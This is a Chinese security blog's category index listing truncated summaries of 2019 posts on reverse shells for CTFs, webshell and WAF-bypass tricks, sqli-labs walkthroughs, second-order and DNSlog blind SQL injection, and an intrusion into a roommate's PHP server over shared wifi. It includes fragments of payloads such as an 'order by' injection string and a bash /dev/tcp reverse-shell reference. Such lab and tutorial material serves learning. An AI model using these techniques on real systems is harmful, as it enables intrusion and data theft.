随笔分类 -  安全相关—实操

摘要:写在正文前 回到寝室看见室友x帅在做web作业,突发奇想:web作业,运行了php环境,同c段,不就直接能访问?早该想到 😰 为了确定,问了句,“连的wifi啊?”,答曰,“是”。(x帅:莫名其妙。笔者:暗自窃喜) (友情测试,事后已与x帅签订免责协议😄) 正文 分为两部分,一般人看不懂的部分和 阅读全文
posted @ 2019-04-24 19:39 p0pl4r 阅读(570) 评论(1) 推荐(1)
摘要:01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波。 02 环境 win10 192.168.43.151 监听端 装有nc kali 192.168.253.128 反弹端 自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp 阅读全文
posted @ 2019-04-02 16:40 p0pl4r 阅读(3942) 评论(0) 推荐(0)
摘要:1.利用curl的变量解释符$ php版本 利用代码 Bash将$baidu分析为一个空变量,并且使用curl请求了sec-redclub<empty> .com。 然而这只发生在curl语法中。 实际上,正如上面的屏幕截图所示,由parse_url()解析的主机名仍然是 sec-redclub$b 阅读全文
posted @ 2019-04-02 15:25 p0pl4r 阅读(988) 评论(0) 推荐(0)
摘要:1.mysql执行语句拿shell 2.利用md5绕过waf 注:default失败!其他编码成功! 3.get_defined_vars()函数马:在过滤$的情况下可使用 4.不含字母数字马 注:只能菜刀连接! 或者 https://www.freebuf.com/articles/web/173 阅读全文
posted @ 2019-03-31 18:26 p0pl4r 阅读(1194) 评论(0) 推荐(0)
摘要:sqli11: post:uname=xx' order by 2#&passwd=bla&submit=Submit(判定字段为2) 解释下为什么结果不是admin,这是sql执行的顺序问题 sqli12: sqli13: 不会返回登陆信息,只会提示成功与否。 盲注! sqli14: sqli15 阅读全文
posted @ 2019-03-28 20:56 p0pl4r 阅读(313) 评论(0) 推荐(0)
摘要:二次排序注入 二次排序注入也称为存储型注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入。 二次排序注入思路: 1. 黑客通过构造数据的形式,在浏览器或者其他软件中提交 HTTP 数据报文请求到服务 端进行处理,提交的数据报文请求中可能 阅读全文
posted @ 2019-03-24 20:25 p0pl4r 阅读(407) 评论(1) 推荐(1)
摘要:sqli23: and|or型报错 union型嵌套select 阅读全文
posted @ 2019-03-24 20:11 p0pl4r 阅读(102) 评论(0) 推荐(0)
摘要:sqli18: uname和passwd被处理了; uagent和ip插入到了数据库; 还带回显。 抓包改包 sqli19: null sqli20: 审计代码,大概如下 当我们正常登录后username赋值给cookie['cookee'];当submit为空,执行由cookee查询的sql语句, 阅读全文
posted @ 2019-03-24 19:57 p0pl4r 阅读(277) 评论(0) 推荐(0)
摘要:增 删 删数据库:drop database 数据库名; 删除表:drop table 表名; 删除表中的列:alter table 表名 drop column 列名; 改 sqli17: [ * ] 源码中可以看见对username做了check处理,所以闭合点要放在password处。 阅读全文
posted @ 2019-03-24 18:34 p0pl4r 阅读(150) 评论(0) 推荐(0)
摘要:1,Load_file()导出文件 使用条件: A.必须有权限读取并且文件必须完全可读(and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。) B.欲读取文件必须在服务器上 C.必须指定文件完整的路径(常用路径) D.欲读取文件必须 阅读全文
posted @ 2019-03-24 17:42 p0pl4r 阅读(224) 评论(0) 推荐(0)
摘要:思考1:当# --+都被过滤时,只能考虑闭合处理 思考2:union联合注入时必须先判断字段长度 sqli5: 首先判断出对id经过了'处理 其次发现结果不再回显 ok那就盲注了,先判断mysql版本,版本过低可优先考虑dns边信道攻击。 bool盲注(and逻辑)的脚本(substr) 1 # - 阅读全文
posted @ 2019-03-23 23:14 p0pl4r 阅读(404) 评论(0) 推荐(0)
摘要:sqli1: 脚本 1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://loca 阅读全文
posted @ 2019-03-23 15:38 p0pl4r 阅读(457) 评论(0) 推荐(0)
摘要:step1: 通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。 1、当secure_file_priv为空,就可以读取磁盘的目录。 2、当secure_file_priv为G:\,就可以读 阅读全文
posted @ 2019-03-22 22:02 p0pl4r 阅读(2099) 评论(0) 推荐(0)